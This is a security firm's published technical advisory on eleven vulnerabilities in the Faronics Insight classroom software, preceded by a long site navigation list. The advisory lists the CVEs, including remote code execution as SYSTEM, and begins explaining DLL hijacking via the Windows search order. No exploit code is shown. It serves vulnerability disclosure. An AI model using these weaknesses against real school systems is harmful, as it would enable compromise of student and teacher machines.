* Introspy for Android
* RtspFuzzer
* SSLyze v0.8
* NCLoader
* IG Learner Walkthrough
* Forensic Fuzzing Tools
* Security First Umbrella
* Autochrome
* WSSiP: A Websocket Manipulation Proxy
* AssetHook
* Call Map: A Tool for Navigating Call Graphs in Python
* Sobelow: Static analysis for the Phoenix Framework
* G-Scout
* Decoder Improved Burp Suite Plugin
* Python Class Informer: an IDAPython plugin for viewing run-time type
information (RTTI)
* AutoRepeater: Automated HTTP Request Repeating With Burp Suite
* Open Banking: Security considerations & potential risks
* scenester
* port-scan-automation
* Windows DACL Enum Project
* umap
* Shocker
* Zulu
* whitebox
* vlan-hopping
* tybocer
* xcavator
* WindowsJobLock
* Azucar
* Introducing Azucar
* Readable Thrift
* Decoding network data from a Gh0st RAT variant
* Technical Advisory: Multiple Vulnerabilities in ManageEngine Desktop Central
* Discovering Smart Contract Vulnerabilities with GOATCasino
* BLEBoy
* APT15 is Alive and Strong: An Analysis of RoyalCli and RoyalDNS
* TPM Genie: Interposer Attacks Against the Trusted Platform Module Serial Bus
* Technical Advisory: Code Execution by Unsafe Resource Handling in Multiple
Microsoft Products
* Technical Advisory: Code Execution by Viewing Resource Files in .NET
Reflector
* Technical Advisory: Reflected Cross-Site Scripting (XSS) vulnerability in
Jenkins Delivery Pipeline plugin
* Spectre and Meltdown: What you Need to Know
* The economics of defensive security
* HIDDEN COBRA Volgmer: A Technical Analysis
* Integrity destroying malicious code for financial or geopolitical gain: A
vision of the future?
* Kubernetes Security: Consider Your Threat Model
* Mobile & web browser credential management: Security implications, attack
cases & mitigations
* SOC maturity & capability
* Automated Reverse Engineering of Relationships Between Data Structures in C++
Binaries
* Pointer Sequence Reverser (PSR)
* Cisco ASA series part eight: Exploiting the CVE-2016-1287 heap overflow over
IKEv1
* Bypassing Android’s Network Security Configuration
* Technical Advisory – Bomgar Remote Support – Local Privilege Escalation
* Cisco ASA series part seven: Checkheaps
* Adversarial Machine Learning: Approaches & defences
* eBook: Breach notification under GDPR – How to communicate a personal data
breach
* Cisco ASA series part six: Cisco ASA mempools
* The Update Framework (TUF) Security Assessment
* Cisco ASA series part five: libptmalloc gdb plugin
* Technical Advisory: Adobe ColdFusion RMI Registry.bind() Deserialisation RCE
* Technical Advisory: Adobe ColdFusion Object Deserialisation RCE
* Cisco ASA series part four: dlmalloc-2.8.x, libdlmalloc, & dlmalloc on Cisco
ASA
* Decoder Improved Burp Suite plugin release part two
* Cisco ASA series part three: Debugging Cisco ASA firmware
* Managing PowerShell in a modern corporate environment
* Cisco ASA series part two: Static analysis & datamining of Cisco ASA firmware
* Cisco ASA series part one: Intro to the Cisco ASA
* EternalGlue part one: Rebuilding NotPetya to assess real-world resilience
* Technical Advisory: Authentication rule bypass
* Technical Advisory – play-pac4j Authentication rule bypass
* Decoder Improved Burp Suite plugin release part one
* Technical advisory: Remote shell commands execution in ttyd
* Poison Ivy string decryption
* Securing the continuous integration process
* Signaturing an Authenticode anomaly with Yara
* Analysing a recent Poison Ivy sample
* Endpoint connectivity
* DeLux Edition: Getting root privileges on the eLux Thin Client OS
* UK government cyber security guidelines for connected & autonomous vehicles
* Smuggling HTA files in Internet Explorer/Edge
* Database Security Brief: The Oracle Critical Patch Update for April 2007
* Buffer Underruns, DEP, ASLR and improving the Exploitation Prevention
Mechanisms (XPMs) on the Windows platform
* Data-mining with SQL Injection and Inference
* The Pharming Guide – Understanding and preventing DNS related attacks by
phishers
* Weak Randomness Part I – Linear Congruential Random Number Generators
* Exploiting PL/SQL Injection Flaws with only CREATE SESSION Privileges
* Blind Exploitation of Stack Overflow Vulnerabilities
* Slotting Security into Corporate Development
* Creating Arbitrary Shellcode In Unicode Expanded Strings
* Violating Database – Enforced Security Mechanisms
* Hacking the Extensible Firmware Interface
* Advanced Exploitation of Oracle PL/SQL Flaws
* Firmware Rootkits: The Threat to the Enterprise
* Database Security: A Christmas Carol
* Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft
Windows 2003 Server
* Non-flood/non-volumetric Distributed Denial of Service (DDoS)
* VoIP Security Methodology and Results
* E-mail Spoofing and CDONTS.NEWMAIL
* Dangling Cursor Snarfing: A New Class of Attack in Oracle
* Database Servers on Windows XP and the unintended consequences of simple file
sharing
* DNS Pinning and Web Proxies
* Technical advisory: CVE-2017-8592 – XMLHttpRequest in IE followed 307
redirections with additional or customised headers
* Which database is more secure? Oracle vs. Microsoft
* Variations in Exploit methods between Linux and Windows
* Using graph databases to assess the security of thingernets based on the
thingabilities and thingertivity of things
* Live Incident Blog: June Global Ransomware Outbreak
* Beyond data loss prevention
* How to protect yourself & your organisation from phishing attacks
* Rise of the machines: Machine Learning & its cyber security applications
* Combating Java Deserialisation Vulnerabilities with Look-Ahead Object Input
Streams (LAOIS)
* A WarCon 2017 Presentation: Cisco ASA – Exploiting the IKEv1 Heap Overflow –
CVE-2016-1287
* Latest threats to the connected car & intelligent transport ecosystem
* Network Attached Security: Attacking a Synology NAS
* Accessing Private Fields Outside of Classes in Java
* Understanding the insider threat & how to mitigate it
* Matty McMattface: Security implications, mitigations & testing strategies for
biometric facial recognition systems
* Setting a New Standard for Kubernetes Deployments
* Encryption at rest: Not the panacea to data protection
* Applying normalised compression distance for architecture classification
* Microsoft Zero-Day Vulnerability – OLE2Link – Threat Intelligence and
Signatures
* D-LINK DIR-850L web admin interface vulnerable to stack-based buffer overflow
* Fix Bounty
* Unauthenticated XML eXternal Entity (XXE) vulnerability
* General Data Protection Regulation: Knowing your data
* Technical Advisory: Shell Injection in MacVim mvim URI Handler
* Technical Advisory: Shell Injection in SourceTree
* SCOMplicated? – Decrypting SCOM “RunAs” credentials
* Technical Advisory: Multiple Vulnerabilities in Accellion File Transfer
Appliance
* ISM RAT
* Mergers & Acquisitions (M&A) cyber security due diligence
* Advisory-CraigSBlackie-CVE-2016-9795
* Best practices with BYOD
* Technical Advisory: Nexpose Hard‐coded Java Key Store Passphrase Allows
Decryption of Stored Credentials
* Compromising Apache Tomcat via JMX access
* Berserko: Kerberos Authentication for Burp Suite
* Java RMI Registry.bind() Unvalidated Deserialization
* NCC CON Europe 2017
* Understanding cyber risk management vs uncertainty with confidence in 2017
* iOS MobileSlideShow USB Image Class arbitrary code execution.txt
* Denial of Service in Parsing a URL by ierutil.dll
* U plug, we play
* SSL checklist for pentesters
* Dissecting social engineering attacks
* External Enumeration and Exploitation of Email and Web Security Solutions
* Social Engineering
* Phishing Stories
* Automating extraction from malware and recent campaign analysis
* DDoS Common Approaches and Failings
* Absolute Security
* How much training should staff have on cyber security?
* USB under the bonnet: Implications of USB security vulnerabilities in vehicle
systems
* Cyber Essentials Scheme
* Webinar – PCI Version 3.0: Are you ready?
* Webinar: 4 Secrets to a Robust Incident Response Plan
* Cloud Security Presentation
* Webinar: SMACK, SKIP-TLS & FREAK SSL/TLS vulnerabilities
* Revealing Embedded Fingerprints: Deriving intelligence from USB stack
interactions
* Memory Gap
* 44Con2013Game
* creep-web-app-scanner
* ncccodenavi
* Pip3line
* typofinder
* DIBF – Updated
* IODIDE
* CECSTeR
* cisco-SNMP-enumeration
* dotnetpaddingoracle
* dotnetpefuzzing
* easyda
* EDIDFuzzer
* Fat-Finger
* firstexecution
* grepify
* FrisbeeLite
* State-of-the-art email risk
* Ransomware: what organisations can do to survive
* hostresolver
* lapith
* metasploitavevasion
* Maritime Cyber Security: Threats and Opportunities
* IP-reputation-snort-rule-generator
* The L4m3ne55 of Passw0rds: Notes from the field
* Mature Security Testing Framework
* Exporting non-exportable RSA keys
* Black Hat USA 2015 presentation: Broadcasting your attack-DAB security
* The role of security research in improving cyber security
* Self-Driving Cars- The future is now…
* They Ought to Know Better: Exploiting Security Gateways via their Web
Interfaces
* Mobile apps and security by design
* The Myth of Twelve More Bytes: Security on the Post-Scarcity Internet
* When Security Gets in the Way: PenTesting Mobile Apps That Use Certificate
Pinning
* USB Undermining Security Barriers:further adventures with USB
* Software Security Austerity Security Debt in Modern Software Development
* RSA Conference – Mobile Threat War Room
* Finding the weak link in binaries
* To dock or not to dock, that is the question: Using laptop docking stations
as hardware-based attack platforms
* Harnessing GPUs Building Better Browser Based Botnets
* The Browser Hacker’s Handbook
* SQL Server Security
* The Database Hacker’s Handbook
* Social Engineering Penetration Testing
* Public Report – Matrix Olm Cryptographic Review
* Research Insights Volume 8 – Hardware Design: FPGA Security Risks
* Zcash Cryptography and Code Review
* Optimum Routers: Researching Managed Routers
* Peeling back the layers on defence in depth…knowing your onions
* End-of-life pragmatism
* iOS Instrumentation Without Jailbreak
* The Password is Dead, Long Live the Password!
* Microsoft Office Memory Corruption Vulnerability
* Windows 10 USB Mass Storage driver arbitrary code execution in kernel mode
* Elephant in the Boardroom Survey 2016
* A Peek Behind the Great Firewall of Russia
* Avoiding Pitfalls Developing with Electron
* Flash local-with-filesystem Bypass in navigateToURL
* D-Link routers vulnerable to Remote Code Execution (RCE)
* iOS Application Security: The Definitive Guide for Hackers and Developers
* The Mobile Application Hacker’s Handbook
* Research Insights Volume 9 – Modern Security Vulnerability Discovery
* Post-quantum cryptography overview
* The CIS Security Standard for Docker available now
* An adventure in PoEKmon NeutriGo land
* The Shellcoder’s Handbook: Discovering and Exploiting Security Holes, 2nd
Edition
* How will GDPR impact your communications?
* Potential false redirection of web site content in Internet in SAP NetWeaver
web applications
* Multiple security vulnerabilities in SAP NetWeaver BSP Logon
* The Automotive Threat Modeling Template
* My name is Matt – My voice is my password
* Ransomware: How vulnerable is your system?
* NCC Group WhitepaperUnderstanding and HardeningLinux ContainersJune 29, 2016
– Version 1.1
* My Hash is My Passport: Understanding Web and Mobile Authentication
* Project Triforce: Run AFL on Everything!
* Writing Exploits for Win32 Systems from Scratch
* How to Backdoor Diffie-Hellman
* Local network compromise despite good patching
* Sakula: an adventure in DLL planting
* When a Trusted Site in Internet Explorer was Anything But
* GSM/GPRS Traffic Interception for Penetration Testing Engagements
* An Adaptive-Ciphertext Attack Against “I ⊕ C” Block Cipher Modes With an
Oracle
* Creating a Safer OAuth User Experience
* Attacking Web Service Security: Message Oriented Madness, XML Worms and Web
Service Security Sanity
* Aurora Response Recommendations
* Blind Security Testing – An Evolutionary Approach
* Building Security In: Software Penetration Testing
* Cleaning Up After Cookies
* Command Injection in XML Signatures and Encryption
* Common Flaws of Distributed Identity and Authentication Systems
* Cross Site Request Forgery: An Introduction to a Common Web Application
Weakness
* Developing Secure Mobile Applications for Android
* Exposing Vulnerabilities in Media Software
* Hunting SQL Injection Bugs
* IAX Voice Over-IP Security
* ProxMon: Automating Web Application Penetration Testing
* iSEC’s Analysis of Microsoft’s SDL and its ROI
* Secure Application Development on Facebook
* Secure Session Management With Cookies for Web Applications
* Security Compliance as an Engineering Discipline
* Weaknesses and Best Practices of Public Key Kerberos with Smart Cards
* Exploiting Rich Content
* HTML5 Security The Modern Web Browser Perspective
* An Introduction to Authenticated Encryption
* Attacks on SSL
* Content Security Policies Best Practices
* Windows Phone 7 Application Security Survey
* Browser Extension Password Managers
* Introducing idb-Simplified Blackbox iOS App Pentesting
* Login Service Security
* The factoring dead: Preparing for the cryptopocalypse
* Auditing Enterprise Class Applications and Secure Containers on Android
* Early CCS Attack Analysis
* Analysis of Boomerang Differential Trials via a SAT-Based Constraint Solver
URSA
* Perfect Forward Security
* Internet of Things Security
* Secure Messaging for Normal People
* Understanding and Hardening Linux Containers
* Adventures in Windows Driver Development: Part 1
* Private sector cyber resilience and the role of data diodes
* From CSV to CMD to qwerty
* General Data Protection Regulation – are you ready?
* Business Insights: Cyber Security in the Financial Sector
* The Importance of a Cryptographic Review
* osquery Application Security Assessment Public Report
* Sysinternals SDelete: When Secure Delete Fails
* Ricochet Security Assessment Public Report
* Breaking into Security Research at NCC Group
* Building Systems from Commercial Components
* Modernizing Legacy Systems: Software Technologies, Engineering Processes, and
Business Practices
* Secure Coding in C and C++
* CERT Oracle Secure Coding Standard for Java
* CERT C Secure Coding Standard
* Java Coding Guidelines: 75 Recommendations for Reliable and Secure Programs
* Professional C Programming LiveLessons, (Video Training) Part I: Writing
Robust, Secure, Reliable Code
* Secure Coding in C and C++, 2nd Edition
* The CERT® C Coding Standard, Second Edition: 98 Rules for Developing Safe,
Reliable, and Secure Systems
* Secure Coding Rules for Java LiveLessons, Part 1
* Hacking Displays Made Interesting
* What the HEC? Security implications of HDMI Ethernet Channel and other
related protocols
* 44CON Workshop – How to assess and secure iOS apps
* Payment Card Industry Data Security Standard (PCI DSS) A Navigation and
Explanation of Changes from v2.0 to v3.0
* Mobile World Congress – Mobile Internet of Things
* Practical SME security on a shoestring
* BlackHat Asia USB Physical Access
* How we breach network infrastructures and protect them
* Hacking a web application
* Batten down the hatches: Cyber threats facing DP operations
* Threats and vulnerabilities within the Maritime and shipping sectors
* Distributed Ledger (Blockchain) Security and Quantum Computing Implications
* Abusing Privileged and Unprivileged Linux Containers
* A few notes on usefully exploiting libstagefright on Android 5.x
* NCC Con Europe 2016
* Remote Exploitation of Microsoft Office DLL Hijacking (MS15-132) via Browsers
* Phishing Mitigations: Configuring Microsoft Exchange to Clearly Identify
External Emails
* Car Parking Apps Vulnerable To Hacks
* eBook – Do you know how your organisation would react in a real-world attack
scenario?
* Erlang Security 101
* SysAid Helpdesk blind SQL injection
* SysAid Helpdesk stored XSS
* Virtual Access Monitor Multiple SQL Injection Vulnerabilities
* Whatsupgold Premium Directory traversal
* Windows remote desktop memory corruptoin leading to RCE on XPSP3
* Windows USB RNDIS driver kernel pool overflow
* Drones: Detect, Identify, Intercept, and Hijack
* Introducing Chuckle and the Importance of SMB Signing
* Threat Intelligence: Benefits for the Enterprise
* Best Practices for the use of Static Code Analysis within a Real-World Secure
Development Lifecycle
* Secure Device Manufacturing: Supply Chain Security Resilience
* eBook – Planning a robust incident response process
* HDMI Ethernet Channel
* Advanced SQL Injection in SQL Server Applications
* USB keyboards by post – use of embedded keystroke injectors to bypass autorun
restrictions on modern desktop operating systems
* ASP.NET Security and the Importance of KB2698981 in Cloud Environments
* Xen HYPERVISOR_xen_version stack memory revelation
* Windows Remote Desktop Memory Corruption Leading to RCE on XPSP3
* SysAid Helpdesk Pro – Blind SQL Injection
* Symantec Messaging Gateway SSH with backdoor user account + privilege
escalation to root due to very old Kernel
* Symantec Messaging Gateway Out of band stored XSS delivered by email
* Symantec Messaging Gateway Easy CSRF to add a backdoor-administrator (for
example)
* Symantec Messaging Gateway Arbitrary file download is possible with a crafted
URL (authenticated)
* Symantec Backup Exec 2012 – Persistent XSS Vulnerability Affecting Custom
Reports
* Symantec Backup Exec 2012 – OS version and service pack information leak
* Symantec Backup Exec 2012 – Linux Backup Agent Heap Overflow
* Symantec Backup Exec 2012 Backup/Restore Data Traverses Memory with Weak ACLs
* Symantec Backup Exec 2012 – Backup Exec Utility Stored XSS when adding
Groups, Servers and Computers
* Squiz CMS File Path Traversal
* Solaris 11 USB Hub Class descriptor kernel stack overflow
* SmarterMail – Stored XSS in emails
* Remote code execution in ImpressPages CMS
* OS X 10.6.6 Camera Raw Library Memory Corruption
* Oracle Java Installer Adds a System Path Which is Writable by All
* Oracle Hyperion 11 Directory Traversal
* Oracle E-Business Suite Pre-Auth SQLi with DBA Privileges
* Nessus Authenticated Scan – Local Privilege Escalation
* NCC Group Malware Technical Note
* Nagios XI Network Monitor – Stored and Reflective XSS
* Multiple Vulnerabilities in MailEnable
* Microsoft Internet Explorer CMarkup Use-After-Free
* McAfee Email and Web Security Appliance v5.6 – Session hijacking (and
bypassing client-side session timeouts)
* McAfee Email and Web Security Appliance v5.6 – Password hashes can be
recovered from a system backup and easily cracked
* McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is
possible with a crafted URL, when logged in as any user
* McAfee Email and Web Security Appliance v5.6 – Any logged-in user can bypass
controls to reset passwords of other administrators
* McAfee Email and Web Security Appliance v5.6 – Active session tokens of other
users are disclosed within the UI
* iOS 7 arbitrary code execution in kernel mode
* Understanding Microsoft Word OLE Exploit Primitives
* Understanding Microsoft Word OLE Exploit Primitives: Exploiting CVE-2015-1642
Microsoft Office CTaskSymbol Use-After-Free Vulnerability
* Porting the Misfortune Cookie Exploit: A Look into Router Exploitation Using
the TD-8817
* Vehicle Emissions and Cyber Security
* Research Insights Volume 6: Common Issues with Environment Breakouts
* Does TypeScript Offer Security Improvements Over JavaScript?
* Common Security Issues in Financially-Oriented Web Applications
* Research Insights Volume 3 – How are we breaking in: Mobile Security
* Build Your Own Wi-Fi Mapping Drone Capability
* Exploiting CVE-2015-2426, and How I Ported it to a Recent Windows 8.1 64-bit
* Exploiting MS15-061 Use-After-Free Windows Kernel Vulnerability
* Password and brute-force mitigation policies
* Understanding Ransomware: Impact, Evolution and Defensive Strategies
* libtalloc: A GDB plugin for analysing the talloc heap
* Lumension Device Control (formerly Sanctuary) remote memory corruption
* LibAVCodec AMV Out of Array Write
* Increased exploitation of Oracle GlassFish Server Administration Console
Remote Authentication Bypass
* Flash security restrictions bypass: File upload by URLRequest
* Immunity Debugger Buffer Overflow
* DataArmor Full Disk Encryption 3.0.12c – Restricted Environment breakout,
Privilege Escalation and Full Disk Decryption
* Cups-filters remote code execution
* Critical Risk Vulnerability in SAP Message Server (Heap Overflow)
* Critical Risk Vulnerability in SAP DB Web Server (Stack Overflow)
* Critical Risk Vulnerability in Ingres (Pointer Overwrite 2)
* Critical Risk Vulnerability in Ingres (Pointer Overwrite 1)
* Cisco VPN Client Privilege Escalation
* Cisco IPSec VPN Implementation Group Name Enumeration
* Blue Coat BCAAA Remote Code Execution Vulnerability
* BlackBerry Link WebDav Server Bound to the BlackBerry VPN Adapter
* Bit51 Better Security WP Security Plugin – Unauthenticated Stored XSS to RCE
* Back Office Web Administration Authentication Bypass
* AtHoc Toolbar
* ASE 12.5.1 datatype overflow
* Archived Technical Advisories
* Apple QuickTime Player m4a Processing Buffer Overflow
* Apple OSX/iPhone iOS ImageIO TIFF getBandProcTIFF TileWidth Heap Overflow
* Apple Mac OS X ImageIO TIFF Integer Overflow
* Apple CoreAnimation Heap Overflow
* Writing Small Shellcode
* Writing Secure ASP Scripts
* Windows 2000 Format String Vulnerabilities
* The Pentesters Guide to Akamai
* Adobe flash sandbox bypass to navigate to local drives
* Adobe Flash Player Cross Domain Policy Bypass
* Adobe Acrobat Reader XML Forms Data Format Buffer Overflow
* Tool Release: Introducing opinel: Scout2’s favorite tool
* Broadcasting your attack – DAB security
* Modelling Threat Actor Phishing Behaviour
* Research Insights Volume 7: Exploitation Advancements
* Exploiting the win32k!xxxEnableWndSBArrows use-after-free (CVE-2015-0057) bug
on both 32-bit and 64-bit
* The Demise of Signature Based Antivirus
* Stopping Automated Attack Tools
* Security of Things: An Implementers’ Guide to Cyber-Security for Internet of
Things Devices and Beyond
* Security Best Practice: Host Naming & URL Conventions
* Securing PL/SQL Applications with DBMS_ASSERT
* Second-Order Code Injection Attacks
* Revealing Embedded Fingerprints: Deriving Intelligence from USB Stack
Interactions 2013
* Research Insights Volume 4 – Sector Focus: Maritime Sector
* Research Insights Volume 2 – Defensive Trends
* Research Insights Volume 1 – Sector Focus: Financial Services
* Quantum Cryptography – A Study Into Present Technologies and Future
Applications
* Protecting stored cardholder data (an unofficial supplement to PCI DSS V3.0)
* Preparing for Cyber Battleships – Electronic Chart Display and Information
System Security
* Passive Information Gathering – The Analysis of Leaked Network Security
Information
* Oracle Passwords and OraBrute
* Oracle Forensics Part 7 Using the Oracle System Change Number in Forensic
Investigations
* Oracle Forensics Part 6: Examining Undo Segments, Flashback and the Oracle
Recycle Bin
* Oracle Forensics Part 5: Finding Evidence of Data Theft in the Absence of
Auditing
* Oracle Forensics Part 4: Live Response
* Oracle Forensics Part 3: Isolating Evidence of Attacks Against the
Authentication Mechanism
* Oracle Forensics Part 2: Locating Dropped Objects
* Oracle Forensics Part 1: Dissecting the Redo Logs
* Non-stack Based Exploitation of Buffer Overrun Vulnerabilities on Windows NT
2000 XP
* New Attack Vectors and a Vulnerability Dissection of MS03-007
* More Advanced SQL Injection
* Microsoft’s SQL Server vs. Oracle’s RDBMS
* Microsoft SQL Server Passwords
* Low Cost Attacks on Smart Cards – The Electromagnetic Side-Channel
* Lessons learned from 50 bugs: Common USB driver vulnerabilities
* Inter-Protocol Exploitation
* Inter-Protocol Communication
* Improving your Network and Application Assurance Strategy in an environment
of increasing 0day vulnerabilities
* Implementing and Detecting a PCI Rootkit
* How organisations can properly configure SSL services to ensure the integrity
and confidentiality of data in transit
* Hackproofing Oracle Application Server
* Hackproofing MySQL
* Hackproofing Lotus Domino Web Server
* Hacking Appliances: Ironic exploits in security products
* Fuzzing USB devices using Frisbee Lite
* HDMI – Hacking Displays Made Interesting
* Exploiting Security Gateways Via Web Interfaces
* Research Insights Volume 5 – Sector Focus: Automotive
* The why behind web application penetration test prerequisites
* Blackbox iOS App Assessments Using idb
* Cyber red-teaming business-critical systems while managing operational risk
* Blind Return Oriented Programming
* Username enumeration techniques and their value
* IAM user management strategy (part 2)
* Faux Disk Encryption: Realities of Secure Storage On Mobile Devices
* Some Notes About the Xen XSA-122 Bug
* USB attacks need physical access right? Not any more…
* Image IO Memory Corruption
* Threat Profiling Microsoft SQL Server
* Thin Clients: Slim Security
* Impress Pages CMS Remote Code Execution
* The Phishing Guide: Understanding & Preventing Phishing Attacks
* Lumension Device Control Remote Memory Corruption
* McAfee Email and Web Security Appliance Active session tokens of other users
are disclosed within the UI
* McAfee Email and Web Security Appliance Any logged-in user can bypass
controls to reset passwords of other administrators
* Adam Roberts
* Anthony Ferrillo
* Aaron Greetham
* Aaron Haymore
* Alberto Verza
* Aleksandar Kircanski
* Alessandro Fanio Gonzalez
* Alessandro Fanio González
* Alex Plaskett
* Alex Zaviyalov
* Alvaro Martin Fraguas
* Álvaro Martín Fraguas
* Andrea Shirley-Bellande
* Drew Wade
* Andy Davis
* Andy Grant
* Antonis Terefos
* anvesh3752
* Alexander Smye
* aschmitz
* Author Test
* Ava Howell
* Andrew Whistlecroft
* balazs.bucsay
* Nicolas Bidron
* NCC Group Physical Breach Team
* Rich Warren
* Caleb Watt
* Clinton Carpene
* Cedric Halbronn
* chrisanley
* Christo Butcher
* Clayton Lowell
* Clint Gibler
* cnevncc
* Contributor Test
* corancc
* Corey Arthur
* Christian Powills
* Craig Blackie
* Catalin Visinescu
* Ken Wolstencroft
* Dale Pavey
* Damon Small
* Dan Hastings
* Dave G.
* David Tulis
* David Cash
* Daniele Costa
* destoken
* Diana Dragusin
* Diego Gomez Maranon
* Diego Gómez Marañon
* Domen Puncer Kugler
* Daniel Romero
* Deni
* David Young
* Edward Torkington
* Exploit Development Group
* elenabakoslang
* Eli Sohl
* epliuncc
* Erik Schamper
* Erik Steringer
* Eric Schorn
* fernandogallegopinero
* Aaron Adams
* Gavin Cotter (Temp)
* Gerald Doussot
* Gérald Doussot
* Giacomo Pope
* Global Threat Intelligence
* Guy Morley
* William Handy
* Liew hock lai
* Hollie Mowatt
* Heather Overcash
* Rob Wood
* Iain Smart
* Izzy Whistlecroft
* Jacob Heath
* Jameson Hyde
* Phillip Langlois and Edward Torkington
* Jashan Benawra
* Jason Kielpinski
* Javed Samuel
* James Chambers
* Jelle Vergeer
* Jennifer Reed
* Jeremy Boone
* Jerome Smith
* Jesus Calderon Marin
* Jesús Calderón Marín
* Jay Houppermans
* Jack Leadford
* Joshua Makinen
* John Redford
* Joost Jansen
* Joshua Dow
* Jose Selvi
* Kenneth Yu
* Kat Sommer
* Katarina Dabler
* Ben Lister
* Krijn de Mik
* Lars Behrens
* Lawrence Munro
* Liam Glanfield
* Liam Stevenson
* Liyun Li
* Lucas Rosevear
* Luke Paris
* Matt Lewis
* Manuel Gines
* Margit Hazenbroek
* Marie-Sarah Lacharite
* Mario Rivas
* NCC Group & Fox-IT Data Science Team
* Max Groot
* McCaulay Hudson
* Michael Gough
* Mostafa Hassan
* Matthew Pettitt
* Frank Gifford
* Michelle Simpson
* Neil Bergman
* NCC Group
* NCC Group Publication Archive
* Bill Marquette
* Daniel Lopezjimenez
* nccdavid
* Dan Helton
* RIFT: Research and Intelligence Fusion Team
* R.Rivera
* NCC Group Red Team
* Ilya Zhuravlev
* Jennifer Fernick
* ncckai
* Lewis Lockwood
* Jon Szymaniak
* Mark Manning
* nccmarktedman
* Michael Sandee
* Simon Palmer
* nccricardomr
* Stefano Antenucci
* Simone Salucci and Daniel Lopez Jimenez
* Samuel Siu
* Tanner Prynn
* Yun Zheng Hu
* Stephen Tomkinson
* Nicolas Guigo
* Nick Galloway
* Nick Muir
* Nick Dunn
* Nick Sirris
* Nikolaos Pantazopoulos
* Oliver Brooks
* Ollie Whitehouse
* Ollie Wen
* Parnian Alimi
* Paul Bottinelli
* Peter Scopes
* Peter Hannay
* philipmarsdennccgroupcom
* Pixel Kicks
* Pixel Kicks
* pixelkicks-fiona
* pixelkicks-fred
* pixelkicks-matt.hamer
* pixelkicks-turhan
* pixelkicks-will
* pqueenncc
* Philipp Schaefer
* qkchambers
* Rory McCune
* Rami McCarthy
* Ray Lai
* Robert C. Seacord
* Rennie deGraaf
* Chris Nevin
* Richard Appleby
* Rick Veldhoven
* Fumik0_
* Rindert Kramer
* Rob Ince
* robertgrimes123
* Robert Wessen
* Ross Bradley
* Robert Schwass
* sampeate
* Roger Meyer
* schlopeckincc
* Siddarth Adukia
* Sam Leonard (they/them)
* Spencer Michaels
* sean.morland@nccgroup.com
* Sander de Jong
* Stuart Kurutac
* Subscriber Test
* Sultan Khan
* Swathi Nagarajan
* Simon Watson
* Jeff Dileo
* Thomas Marshall
* Ivan Reedman
* Thomas Pornin
* Jeremy Boone
* Viktor Gazdag
* Vishtasp Jokhi
* Wouter Jansen
* William Groesbeck
* whoughtonncc
* Wordpress SSO Test
* Xavier Garceau-Aranda
* Ken Gannon
* Kevin Henry
* 5G Security & Smart Environments
* Academic Partnership
* Annual Research Report
* Asia Pacific Research
* Awards & Recognition
* Books
* Business Insights
* CIRT
* Cloud & Containerization
* Cloud Security
* Conferences
* Corporate
* Cryptography
* CTFs/Microcorruption
* Current events
* Cyber as a Science
* Cyber Security
* Detection and Threat Hunting
* Disclosure Policy
* Emerging Technologies
* Engineering
* Fox-IT
* Fox-IT and European Research
* Gaming & Media
* Hardware & Embedded Systems
* Intern Projects
* iSec Partners
* Machine Learning
* Managed Detection & Response
* Misinformation, Deepfakes, & Synthetic Media
* North American Research
* Offensive Security & Artificial Intelligence
* Patch notifications
* Presentations
* protocol_name
* Public interest technology
* Public interest technology
* Public Reports
* Public tools
* Reducing Vulnerabilities at Scale
* Research
* Research Paper
* Reverse Engineering
* Risk Management & Governance
* Standards
* Technical advisories
* Technology Policy
* Threat briefs
* Threat Intelligence
* Tool Release
* Transport
* Tutorial/Study Guide
* UK Research
* Uncategorized
* Virtualization, Emulation, & Containerization
* VSR
* Vulnerability
* Whitepapers
* nccgroup.com
* Support
* 2021 Research Report
* Public Reports
* Contact
Back
Oliver Brooks
Technical advisories
Vulnerability
May 30, 2023
23 mins read
TECHNICAL ADVISORY – MULTIPLE VULNERABILITIES IN FARONICS INSIGHT
(CVE-2023-28344, CVE-2023-28345, CVE-2023-28346, CVE-2023-28347, CVE-2023-28348,
CVE-2023-28349, CVE-2023-28350, CVE-2023-28351, CVE-2023-28352, CVE-2023-28353)
INTRODUCTION
Faronics Insight is a feature rich software platform which is deployed on
premises in schools. The application enables teachers to administer, control and
interact with student devices. The application contains numerous features,
including allowing teachers to transfer files to/from students and remotely
viewing the contents of student screens.
Generally speaking, the architecture of the application is a classic
client/server model – the “server” is the Teacher Console and each “client” is a
Student Console deployed on every student machine in a classroom.
A number of flaws were identified in the Faronics Insight software product, with
consequences ranging from person-in-the-middle attacks on data transmitted
between Student Consoles and Teacher Consoles to Remote Code Execution (RCE) as
SYSTEM on any active Student or Teacher console.
Overall, 11 vulnerabilities were identified, with links to their technical
advisories below:
1. Numerous DLL Hijacking Vulnerabilities in Teacher and Student Consoles
2. Systemic Stored and Reflected Cross Site Scripting Flaws (CVE-2023-28350)
3. RCE As SYSTEM Via Unauthenticated File Upload API (CVE-2023-28353)
4. RCE as SYSTEM via Artificial Student Console and XSS (CVE-2023-28347)
5. RCE as SYSTEM via Artificial Teacher Console (CVE-2023-28349)
6. All Data Transmitted in Plaintext Enabling MITM (CVE-2023-28348)
7. Enhanced Security Mode May Be Bypassed (CVE-2023-28352)
8. Virtual Host Routing Can Be Defeated (CVE-2023-28346)
9. Keystroke Logs Are Stored in Plaintext in a World Readable Directory
(CVE-2023-28351)
10. Lack of Access Controls on Student APIs (CVE-2023-28344)
11. Teacher Console Credentials Exposed via API Endpoint (CVE-2023-28345)
Vulnerability research was performed against Faronics Insight v11.21.2100.262
available on https://faronics.com.
As of Insight v11.23.x.289, these vulnerabilities have been fixed. Faronics’
release notes can be found here.
1. NUMEROUS DLL HIJACKING VULNERABILITIES IN TEACHER AND STUDENT CONSOLES
Risk: High (8.2 CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H.)
SUMMARY
The Teacher Console Server and Student Console Agents both attempt to load a
variety of system DLLs in an unsafe manner.
IMPACT
Because the Teacher Console Server and Student Console Agent processes both
execute as the SYSTEM user, total system compromise can be achieved when a
malicious DLL is loaded inadvertently.
DETAILS
Windows applications make use of Dynamically Linked Libraries (DLL) files to add
or reference additional functionality exposed by those DLLs. DLL files are
typically loaded when applications first start up, and the application typically
knows precisely where the DLL files are located in order to load them as quickly
as possible.
In cases where the DLL file’s path is not hardcoded (“sas.dll” as opposed to
“C:\Windows\System32\sas.dll” for example), Windows will look for the file in a
specific order –
* The directory the application is being loaded from
* The C:\Windows\system32 directory
* The C:\Windows directory
* The directories located in the PATH environment variable.
This is generally sufficient, because developer-supplied DLLs should be loaded
